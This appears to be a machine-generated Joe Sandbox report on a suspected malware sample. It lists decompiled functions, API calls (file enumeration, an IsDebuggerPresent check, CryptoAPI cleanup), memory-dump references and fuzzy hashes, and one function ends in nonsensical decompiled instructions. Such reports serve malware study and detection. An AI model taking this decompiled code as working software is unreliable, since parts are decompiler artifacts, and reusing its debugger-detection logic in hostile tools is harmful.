0x0130d4fd
0x0130d504
0x0130d508
0x0130d50d
0x0130d514
0x0130d514
0x0130d518
0x0130d520
0x0130d524
0x0130d529
0x0130d532
0x0130d53b
0x0130d542
0x0130d547
0x0130d547
0x0130d54c
0x0130d556
0x0130d55d
0x0130d560
0x0130d566
0x0130d573
0x0130d57c
0x0130d583
0x0130d588
0x0130d588
0x0130d58b
0x00000000
0x0130d58b
0x0130d40b
0x0130d40b
0x0130d418
0x0130d423
0x0130d430
0x0130d435
0x0130d43a
0x0130d43b
0x0130d440
0x0130d446
0x0130d44b
0x0130d454
0x0130d45b
0x0130d460
0x0130d460
0x0130d465
0x0130d46f
0x0130d476
0x0130d479
0x0130d47f
0x0130d48c
0x0130d495
0x0130d49c
0x0130d4a1
0x0130d4a1
0x0130d4a6
0x0130d4ac
0x00000000
0x0130d4b2
0x0130d4b2
0x00000000
0x0130d4b2
0x0130d4ac
0x0130d405
0x0130d3fb
0x00000000
0x0130d3ed
0x0130d3e6
0x0130d3e8
0x0130d3e8
0x00000000
0x0130d3e8
0x00000000
0x0130d3ad
0x0130d3a6
0x0130d3a8
0x0130d3a8
0x00000000
0x0130d591
0x0130d59f
0x0130d5a8
0x0130d5a8
0x00000000
0x0130d365
0x0130d2d4
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,39CCA9F6,?,00000000), ref: 0130D312
FindNextFileW.KERNEL32(?,?), ref: 0130D599
FindClose.KERNEL32(?), ref: 0130D5A8

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 76c3d1d916ffb6fdc6d0248777f34b8e31b03b3e7bc490be27cde5c5ead1d068
Instruction ID: b96b00c54809580d92434671b39c9093358216c102f0e8ee5549b3b0d32e2fd6
Opcode Fuzzy Hash: 76c3d1d916ffb6fdc6d0248777f34b8e31b03b3e7bc490be27cde5c5ead1d068
Instruction Fuzzy Hash: 7361A170A11219DFDB25DFA8CC98BADBBF8FF15318F5041E9E80993290DB359A84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0134950E, Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0134950E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t70;
				signed int _t72;
				signed int _t74;

				_t70 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t72 = _t74;
				_t40 =  *0x13a4018; // 0x39cca9f6
				_t41 = _t40 ^ _t72;
				_v8 = _t40 ^ _t72;
				_push(__edi);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0132F8D1(_t41);
					_pop(_t62);
				}
				E013478D0(_t67,  &_v804, 0, 0x50);
				E013478D0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t70;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0132F8D1(_t57);
				}
				return E0132EA79(_v8 ^ _t72, _t70);
			}

0x0134950e
0x0134950e
0x0134950e
0x0134950e
0x01349511
0x01349519
0x0134951e
0x01349520
0x01349527
0x01349528
0x0134952a
0x0134952d
0x01349532
0x01349532
0x0134953e
0x01349551
0x0134955f
0x01349565
0x0134956b
0x01349571
0x01349577
0x0134957d
0x01349583
0x01349589
0x0134958f
0x01349595
0x0134959c
0x013495a3
0x013495aa
0x013495b1
0x013495b8
0x013495bf
0x013495c0
0x013495c9
0x013495cf
0x013495d2
0x013495d8
0x013495e5
0x013495ee
0x013495f7
0x01349600
0x0134960e
0x01349610
0x01349625
0x01349631
0x01349634
0x01349639
0x01349646

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01349606
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01349610
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0134961D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bb06d77843412719a3e203be42849cd4fa082dcf355b34991c90d45b60867d6d
Instruction ID: be046c75db81cfe8f46d91d5839a4a89466ee9cb12a0576544e037fdf9c1a6e1
Opcode Fuzzy Hash: bb06d77843412719a3e203be42849cd4fa082dcf355b34991c90d45b60867d6d
Instruction Fuzzy Hash: 7B31D4759012299BDB21DF68D88879DBBF8BF1C314F5041EAE41CA7250E774AB85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 013091A0, Relevance: 3.0, APIs: 2, Instructions: 33
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013091A0(void* __ecx) {
				long* _t8;
				long* _t9;
				void* _t11;
				void* _t13;
				void* _t15;
				int* _t16;
				int* _t17;

				_t15 = __ecx;
				_t8 =  *(__ecx + 0x58);
				_t16 = __ecx + 0x58;
				if(_t8 != 0) {
					CryptDestroyKey(_t8);
					 *_t16 = 0;
					_t13 = 4;
					do {
						 *_t16 = 0;
						_t16 =  &(_t16[0]);
						_t13 = _t13 - 1;
					} while (_t13 != 0);
				}
				_t9 =  *(_t15 + 0x5c);
				_t17 = _t15 + 0x5c;
				if(_t9 != 0) {
					CryptReleaseContext(_t9, 0);
					 *_t17 = 0;
					_t11 = 4;
					do {
						 *_t17 = 0;
						_t17 =  &(_t17[0]);
						_t11 = _t11 - 1;
					} while (_t11 != 0);
				}
				 *((char*)(_t15 + 0x18)) = 0;
				return _t9;
			}

0x013091a2
0x013091a4
0x013091a7
0x013091ac
0x013091af
0x013091b5
0x013091bb
0x013091c0
0x013091c0
0x013091c3
0x013091c6
0x013091c6
0x013091c0
0x013091cb
0x013091ce
0x013091d3
0x013091d8
0x013091de
0x013091e4
0x013091f0
0x013091f0
0x013091f3
0x013091f6
0x013091f6
0x013091f0
0x013091fb
0x01309201

APIs

CryptDestroyKey.ADVAPI32(?,?,?,013088AD), ref: 013091AF
CryptReleaseContext.ADVAPI32(?,00000000,?,?,013088AD), ref: 013091D8

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Crypt$ContextDestroyRelease
String ID:
API String ID: 1322390979-0
Opcode ID: f431a2aabc4737f681dab141f9ebdecab72add5f0ad6ed86f149ae5ff90f656a
Instruction ID: d0d3aaf317648708908804e0e864ee25e58284397cc09661a708f250de731baa
Opcode Fuzzy Hash: f431a2aabc4737f681dab141f9ebdecab72add5f0ad6ed86f149ae5ff90f656a
Instruction Fuzzy Hash: CBF01D716046539BEB218F2DD818786BBE8BB05308F15045CE684D7686D775F445CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0132E899, Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,0132E9A7,?,00000022,00000000,00000002,?,?,0132C847,00000000,?,00000004,0132B4D9,?,00000004), ref: 0132E8BB
GetLocaleInfoW.KERNEL32(00000000,0000003F,?,01314FA3,?,?,0132E9A7,?,00000022,00000000,00000002,?,?,0132C847,00000000,?), ref: 0132E8C6

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b82c0e78708f3ef6148343e6f047891443af88829070fcdb164553815cdde9b8
Instruction ID: 9c7df5dfe08e1e26d29b56c9f3395e34734a0c36572594e1c69b7e555a83f640
Opcode Fuzzy Hash: b82c0e78708f3ef6148343e6f047891443af88829070fcdb164553815cdde9b8
Instruction Fuzzy Hash: 16E08C3240113DABDF223FA1EC098AE7F2DEB08B20B040024FA1846110CB72A8609BE1

Uniqueness

Uniqueness Score: -1.00%

Function 012FC0AA, Relevance: 2.5, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FC0AA(void* __esi) {

				return HeapFree(GetProcessHeap(), 0, __esi);
			}

0x012fc0ba

APIs

GetProcessHeap.KERNEL32(00000000,00000000,012FC089), ref: 012FC0AD
HeapFree.KERNEL32(00000000), ref: 012FC0B4

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bedf8b3df21e92b2e7d63ecfdfe90c19dfb066f9b4ea3fc2b7996b898485f2d5
Instruction ID: 33ec1bbf0cd9fce98bdcc418e8688e4d56ace2aa42e7337b2d37645ad6d7dc50
Opcode Fuzzy Hash: bedf8b3df21e92b2e7d63ecfdfe90c19dfb066f9b4ea3fc2b7996b898485f2d5
Instruction Fuzzy Hash: B1A00171A49250ABDE716BE1AD0EB4A7E2DAB56752F008440F20A951889B646015CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 012FE4A0, Relevance: 1.9, APIs: 1, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E012FE4A0(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, unsigned int _a4) {
				unsigned int _v8;
				char _v16;
				signed int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				char _v49;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed int _t178;
				signed int _t179;
				intOrPtr _t181;
				void* _t188;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t198;
				intOrPtr _t203;
				intOrPtr* _t205;
				unsigned int _t208;
				void* _t209;
				signed int _t215;
				signed int _t217;
				void* _t218;

				_t196 = __ebx;
				_t215 = _t217;
				_push(0xffffffff);
				_push(0x1365f4d);
				_push( *[fs:0x0]);
				_t218 = _t217 - 0x38;
				_t178 =  *0x13a4018; // 0x39cca9f6
				_t179 = _t178 ^ _t215;
				_v20 = _t179;
				_push(__esi);
				_push(_t179);
				 *[fs:0x0] =  &_v16;
				_t205 = __ecx;
				_t198 =  *(__ecx + 0x7c);
				_t208 = _a4;
				_v48 = _t208;
				if(_t198 <= 0) {
					L2:
					_t181 =  *((intOrPtr*)(_t205 + 0x78));
					if(_t181 <= 0) {
						L4:
						_v44 = 0;
						if(_t208 == 0) {
							L67:
							if(_t198 > 0) {
								_t182 = _t198 + 1;
								 *(_t205 + 0x7c) = _t198 + 1;
							}
							 *[fs:0x0] = _v16;
							_pop(_t209);
							return E0132EA79(_v20 ^ _t215, _t209);
						} else {
							while(1) {
								L5:
								_t203 =  *((intOrPtr*)(_t208 + 4));
								_t11 = _t203 - 1; // 0x8
								_t198 = _t11;
								if(_t198 > 0x14) {
									break;
								}
								switch( *((intOrPtr*)(_t198 * 4 +  &M012FE904))) {
									case 0:
										L23:
										if(_t182 != 0) {
											goto L66;
										} else {
											goto L24;
										}
										goto L75;
									case 1:
										_t190 =  *(_t205 + 0x60);
										_v44 = _t190;
										if((_t190 & 0x00000100) != 0 ||  *_t205 !=  *((intOrPtr*)(_t205 + 0x4c))) {
											_t192 =  *_t205 - 2;
											__eflags = _t192;
											goto L11;
										} else {
											_t182 = _v44 & 0xffffff01;
											_v44 = _t182;
										}
										goto L23;
									case 2:
										__eax =  *__edi;
										__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
										if(__eflags != 0) {
											L11:
											__eflags =  *_t192 - 0xa;
											_t182 = _t192 & 0xffffff00 | __eflags != 0x00000000;
											_v44 = _t182;
										} else {
											 *(__edi + 0x60) =  *(__edi + 0x60) >> 1;
											__al = __al & 0x00000001;
											_v44 =  *(__edi + 0x60) >> 1;
										}
										goto L23;
									case 3:
										__ecx = __edi;
										__eax = E012FFB80(__edi);
										__ecx =  *(__esi + 8);
										__ecx =  *(__esi + 8) & 0x00000001;
										__eflags = __al - __cl;
										_v44 = __eax;
										goto L23;
									case 4:
										__eax =  *__edi;
										__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
										if(__eax ==  *((intOrPtr*)(__edi + 0x50))) {
											goto L65;
										} else {
											__ecx =  *__eax & 0x0000ffff;
											__eflags = __ecx - 0xa;
											if(__ecx == 0xa) {
												goto L65;
											} else {
												__eflags = __ecx - 0xd;
												if(__eflags == 0) {
													goto L65;
												} else {
													__eax = __eax + 2;
													goto L21;
												}
											}
										}
										goto L75;
									case 5:
										__edx =  *(__esi + 0x1c);
										__ecx =  &_v68;
										 *(__esi + 0x18) = __edx +  *(__esi + 0x18) * 2;
										__eax = E012FE970(__ecx, __edx,  *__edi,  *((intOrPtr*)(__edi + 0x50)), __edx +  *(__esi + 0x18) * 2,  *(__edi + 0x70),  *((intOrPtr*)(__edi + 0x5c)));
										goto L20;
									case 6:
										__eax =  *__edi;
										__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
										if( *__edi ==  *((intOrPtr*)(__edi + 0x50))) {
											goto L65;
										} else {
											__ecx = __edi;
											__eax = E012FF8F0(__ebx, __ecx, __edi, __esi);
											__eflags = __al;
											if(__eflags == 0) {
												goto L65;
											} else {
												__al = 0;
												_v44 = __eax;
												L24:
												if(_t208 == 0) {
													goto L66;
												} else {
													_t208 =  *((intOrPtr*)(_t208 + 0xc));
													_v48 = _t208;
													if(_t208 != 0) {
														goto L5;
													} else {
														goto L66;
													}
												}
											}
										}
										goto L75;
									case 7:
										__esi =  *__edi;
										__ecx = __edi + 4;
										__eflags = __edx - 0xb;
										_v24 = 0;
										__edx =  *__ecx;
										asm("xorps xmm0, xmm0");
										_v49 = __eflags == 0;
										_v60 = __edx;
										__eax = 0;
										asm("movups [ebp-0x24], xmm0");
										_v56 = 0;
										_v28 = 0;
										__eax =  *(__ecx + 4);
										_v40 = __esi;
										_v36 = 0;
										_v32 = 0;
										_v64 = __eax;
										__eflags = __edx - __eax;
										if(__edx == __eax) {
											L33:
											__eax =  *(__ecx + 0xc);
											_v24 =  *(__ecx + 0xc);
											__eax = _v48;
											__ecx = __edi;
											_v8 = 0;
											__eax = E012FE4A0(__ebx, __edi, __edi, __esi,  *((intOrPtr*)(_v48 + 0x14)));
											 *__edi = __esi;
											__eflags = __al - _v49;
											if(__al != _v49) {
												__eax = _v44;
												__ecx = _v56;
											} else {
												__eax =  &_v36;
												__ecx = __edi + 4;
												__eax = E012FF010(__ebx, __edi + 4, __edi, __esi,  &_v36);
												__ecx = _v28;
												__eax = 1;
												_v44 = 1;
											}
											_v8 = 0xffffffff;
											__edx = _v36;
											__eflags = __edx;
											if(__eflags == 0) {
												__esi = _v48;
											} else {
												__ecx = __ecx - __edx;
												__ecx = __ecx & 0xfffffffc;
												__eflags = __ecx;
												_push(__ecx);
												__eax = E012F56A0(__ebx, __edi, __edx);
												_v36 = 0;
												_v32 = 0;
												_v28 = 0;
												goto L38;
											}
											goto L23;
										} else {
											__eax = __eax - __edx;
											__eax = __eax >> 2;
											_v56 = __eax;
											__eflags = __eax - 0x3fffffff;
											if(__eax > 0x3fffffff) {
												goto L73;
											} else {
												__eflags = __eax;
												__eax = E012F57D0(__ebx, __edx, __edi, __eax);
												__edx = _v64;
												__ecx = __eax;
												__eax = _v56;
												_v36 = __ecx;
												__eax = __ecx + _v56 * 4;
												__ecx = _v60;
												_v56 = __eax;
												_v28 = __eax;
												_v32 = E01300D50(_v60, _v64, __eflags, _v60);
												__ecx = __edi + 4;
												goto L33;
											}
										}
										goto L75;
									case 8:
										L51:
										__esi = 0;
										goto L23;
									case 9:
										__edx =  *(__esi + 0x14);
										__ecx =  *(__edi + 0x14);
										__eax =  *__edi;
										 *(__ecx + __edx * 8) =  *__edi;
										__eax = _v48;
										__esi =  *(__edi + 0x10);
										__eflags =  *((intOrPtr*)(_v48 + 0x14)) - __esi;
										if(__eflags >= 0) {
											L38:
											__esi = _v48;
										} else {
											do {
												__ecx =  *(__edi + 4);
												__esi = __esi - 1;
												__eax = E012F5800( *(__edi + 4));
												__esi = __esi >> 5;
												__edx = __eax + (__esi >> 5) * 4;
												__ecx = __esi;
												__eax =  *__edx;
												__ecx = __esi & 0x0000001f;
												asm("btr eax, ecx");
												__eax = _v48;
												__eflags =  *((intOrPtr*)(__eax + 0x14)) - __esi;
											} while (__eflags < 0);
											__esi = __eax;
										}
										goto L22;
									case 0xa:
										__eflags =  *((char*)(__edi + 0x65));
										__ecx =  *(__esi + 0x14);
										_v60 = __ecx;
										if(__eflags != 0) {
											L45:
											__edx =  *(__ecx + 0x14);
											__ecx =  *(__edi + 4);
											__eax = E012F5800( *(__edi + 4));
											__ecx = __edx;
											__edx = __edx & 0x0000001f;
											__ecx = __ecx >> 5;
											__ecx = __eax + __ecx * 4;
											__eax =  *__ecx;
											asm("bts eax, edx");
											__edx = _v60;
											__ecx =  *(__edi + 0x14);
											__eax =  *__edi;
											__edx =  *(_v60 + 0x14);
											 *(__ecx + 4 + __edx * 8) =  *__edi;
											goto L22;
										} else {
											__eflags =  *(__ecx + 0x14);
											if(__eflags != 0) {
												goto L45;
											}
										}
										goto L23;
									case 0xb:
										__edx =  *(__esi + 0x14);
										__ecx =  *(__edi + 4);
										__eax = E012F5800( *(__edi + 4));
										__ecx =  *(__esi + 0x14);
										__edx =  *(__esi + 0x14) >> 5;
										__ecx =  *(__esi + 0x14) & 0x0000001f;
										__edx = __eax + ( *(__esi + 0x14) >> 5) * 4;
										1 = 1 << __cl;
										__eflags =  *__edx & 0x00000001 << __cl;
										if(__eflags == 0) {
											L22:
											__eax = _v44;
											goto L23;
										} else {
											__ecx =  *(__edi + 0x14);
											__edx =  *(__esi + 0x14);
											__eax =  *__edi;
											__edx =  *(__edi + 0x14) +  *(__esi + 0x14) * 8;
											__ecx =  *__edx;
											__edx =  *(__edx + 4);
											__eflags = __ecx - __edx;
											if(__eflags == 0) {
												L21:
												 *__edi = __eax;
												goto L22;
											} else {
												__edx =  *(__edi + 0x70);
												__ecx =  &_v72;
												__eax = E012FFBF0(__ecx, __edx, __eax,  *((intOrPtr*)(__edi + 0x50)), __ecx, __edx,  *((intOrPtr*)(__edi + 0x5c)));
												L20:
												__eax =  *__eax;
												__esp = __esp + 0x14;
												__eflags = __eax -  *__edi;
												if(__eflags == 0) {
													L65:
													_v44 = 1;
													L66:
													_t198 =  *(_t205 + 0x7c);
													goto L67;
												} else {
													goto L21;
												}
											}
										}
										goto L75;
									case 0xc:
										__ecx = __edi;
										__eax = E012FF550(__ebx, __edi, __edx, __edi, __eflags, __esi);
										goto L50;
									case 0xd:
										__eax =  *(__esi + 8);
										__ecx = __edi;
										__eax =  *(__esi + 8) >> 1;
										__al = __al & 0x00000001;
										__al & 0x000000ff = E012FF720(__ebx, __edi, __edx, __edi, __esi, __al & 0x000000ff, 0);
										goto L50;
									case 0xe:
										__edx =  *(__esi + 0x14);
										__eflags =  *(__edx + 0x24);
										if(__eflags == 0) {
											__ecx =  *(__edx + 0x20);
											 *(__edi + 0x40) =  *(__edx + 8);
											__ecx = __edi;
											__eax =  *(__edx + 8) >> 1;
											__al = __al & 0x00000001;
											__al & 0x000000ff = E012FF720(__ebx, __edi, __edx, __edi, __edx, __al & 0x000000ff,  *((intOrPtr*)((__al & 0x000000ff) + __edi * 8)));
											L50:
											__edx = _v44;
											__eflags = __al;
											__eax = 1;
											__ecx = __dl & 0x000000ff;
											__ecx =  ==  ? 1 : __dl & 0x000000ff;
											__eflags = __ecx;
											__al = __cl;
											_v44 = 1;
										}
										goto L51;
									case 0xf:
										__eflags =  *(__edi + 0x60) & 0x00002020;
										if(( *(__edi + 0x60) & 0x00002020) == 0) {
											L57:
											__eflags =  *((char*)(__edi + 0x74));
											if( *((char*)(__edi + 0x74)) == 0) {
												L60:
												__eflags =  *((char*)(__edi + 0x64));
												if( *((char*)(__edi + 0x64)) == 0) {
													L62:
													__ecx = __edi + 0x20;
													__eax = E012FEF10(__ebx, __ecx, __edi, __esi, __edi);
													 *((char*)(__edi + 0x64)) = 1;
												} else {
													__ecx = __edi;
													__eax = E012FFA80(__ebx, __ecx, __edi);
													__eflags = __al;
													if(__eflags != 0) {
														goto L62;
													}
												}
												__eax = _v44;
												__esi = 0;
											} else {
												__eax =  *__edi;
												__eflags = __eax -  *((intOrPtr*)(__edi + 0x50));
												if(__eflags == 0) {
													goto L60;
												} else {
													goto L59;
												}
											}
										} else {
											__eax =  *(__edi + 0x4c);
											__eflags = __eax -  *__edi;
											if(__eflags == 0) {
												L59:
												__al = 1;
												__esi = 0;
												_v44 = __eax;
											} else {
												goto L57;
											}
										}
										goto L23;
								}
							}
							_push(0xd);
							E01316C69(__eflags);
							goto L71;
						}
					} else {
						_t195 = _t181 - 1;
						 *((intOrPtr*)(_t205 + 0x78)) = _t195;
						if(_t195 <= 0) {
							goto L72;
						} else {
							goto L4;
						}
					}
				} else {
					_t198 = _t198 - 1;
					 *(__ecx + 0x7c) = _t198;
					if(_t198 <= 0) {
						L71:
						_push(0xc);
						E01316C69(__eflags);
						L72:
						_push(0xb);
						E01316C69(__eflags);
						L73:
						_t188 = E012F4A60();
						asm("into");
						asm("in eax, 0x2f");
						 *_t196 =  *_t196 + _t196;
						asm("in eax, 0x2f");
						 *((intOrPtr*)(_t188 - 0x1b)) =  *((intOrPtr*)(_t188 - 0x1b)) + _t203;
						asm("das");
						 *((intOrPtr*)(_t196 - 0x1b)) =  *((intOrPtr*)(_t196 - 0x1b)) + _t218;
						asm("das");
						 *((intOrPtr*)(_t203 - 0x1b)) =  *((intOrPtr*)(_t203 - 0x1b)) + _t205;
						asm("das");
						 *((intOrPtr*)(_t205 - 0xefed01b)) =  *((intOrPtr*)(_t205 - 0xefed01b)) + _t196;
						asm("in eax, 0x2f");
						asm("in eax, 0x2f");
						asm("in eax, 0x2f");
						 *_t196 =  *_t196 + _t203;
						asm("out 0x2f, al");
						 *_t196 =  *_t196 + _t203;
						asm("out 0x2f, al");
						 *_t205 =  *_t205 + _t203;
						0xe844ea65();
						asm("das");
						 *((intOrPtr*)(_t205 + 0x2f)) =  *((intOrPtr*)(_t205 + 0x2f)) + _t196;
						 *((intOrPtr*)(_t196 - 0x5fed019)) =  *((intOrPtr*)(_t196 - 0x5fed019)) + _t218;
						asm("out 0x2f, eax");
						asm("in eax, 0x2f");
						 *((intOrPtr*)(_t208 + _t198 + _t198 + _t198)) =  *((intOrPtr*)(_t208 + _t198 + _t198 + _t198)) + _t196;
						0xe964ea7d();
						asm("das");
						asm("in eax, 0x2f");
						 *((intOrPtr*)(_t188 + 0x2f + _t215 * 8)) =  *((intOrPtr*)(_t188 + 0x2f + _t215 * 8)) + _t196;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return  *((intOrPtr*)(_t198 + 0x68));
					} else {
						goto L2;
					}
				}
				L75:
			}

0x012fe4a0
0x012fe4a1
0x012fe4a3
0x012fe4a5
0x012fe4b0
0x012fe4b1
0x012fe4b4
0x012fe4b9
0x012fe4bb
0x012fe4be
0x012fe4c0
0x012fe4c4
0x012fe4ca
0x012fe4cc
0x012fe4cf
0x012fe4d2
0x012fe4d7
0x012fe4e5
0x012fe4e5
0x012fe4ea
0x012fe4f8
0x012fe4fa
0x012fe4ff
0x012fe8bc
0x012fe8be
0x012fe8c0
0x012fe8c3
0x012fe8c3
0x012fe8d0
0x012fe8d9
0x012fe8e7
0x012fe505
0x012fe505
0x012fe505
0x012fe505
0x012fe508
0x012fe508
0x012fe50e
0x00000000
0x00000000
0x012fe514
0x00000000
0x012fe5ce
0x012fe5d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012fe51b
0x012fe51e
0x012fe526
0x012fe541
0x012fe541
0x00000000
0x012fe52f
0x012fe532
0x012fe537
0x012fe537
0x00000000
0x00000000
0x012fe550
0x012fe552
0x012fe555
0x012fe544
0x012fe544
0x012fe548
0x012fe54b
0x012fe557
0x012fe55a
0x012fe55c
0x012fe55e
0x012fe55e
0x00000000
0x00000000
0x012fe563
0x012fe565
0x012fe56a
0x012fe56d
0x012fe570
0x012fe575
0x00000000
0x00000000
0x012fe57a
0x012fe57c
0x012fe57f
0x00000000
0x012fe585
0x012fe585
0x012fe588
0x012fe58b
0x00000000
0x012fe591
0x012fe591
0x012fe594
0x00000000
0x012fe59a
0x012fe59a
0x00000000
0x012fe59a
0x012fe594
0x012fe58b
0x00000000
0x00000000
0x012fe5a2
0x012fe5a5
0x012fe5ae
0x012fe5b7
0x00000000
0x00000000
0x012fe5f1
0x012fe5f3
0x012fe5f6
0x00000000
0x012fe5fc
0x012fe5fd
0x012fe5ff
0x012fe604
0x012fe606
0x00000000
0x012fe60c
0x012fe60c
0x012fe60e
0x012fe5d6
0x012fe5d8
0x00000000
0x012fe5de
0x012fe5de
0x012fe5e1
0x012fe5e6
0x00000000
